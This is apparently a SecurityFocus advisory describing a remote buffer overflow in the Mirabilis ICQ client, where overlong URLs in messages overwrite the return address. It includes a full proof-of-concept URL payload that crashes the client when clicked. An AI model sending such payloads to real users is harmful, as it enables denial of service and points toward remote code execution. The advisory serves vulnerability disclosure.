source: http://www.securityfocus.com/bid/929/info ICQ is an individual to individual chat network which has clients installed on millions of computers around the world. It is, by far, the most widely used and is vulnerable to a remote buffer overflow. When the Mirabilis ICQ client parses an url recieved from another user _inside of a message_, it does not perform bounds checking on the length of the url. Because of this, it is possible to overwrite the EIP ("instruction pointer", or return address, that was pushed onto the stack when the offending function was first called) and execute arbitrary and possibly malicious code stuffed inside the oversized URL on the target host once the url is clicked on. Sending the following URL (with no line breaks) in a regular message to a user will cause their ICQ to crash (just a basic proof of concept, no real malicious exploit code included here) if they click on it: http://www.yahoo.com/sites.asp?^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^à ^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^ Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^à ^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^ Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^à ^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^ Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^à ^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^ Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^à ^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^ Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^à ^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã!!!!·P !^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã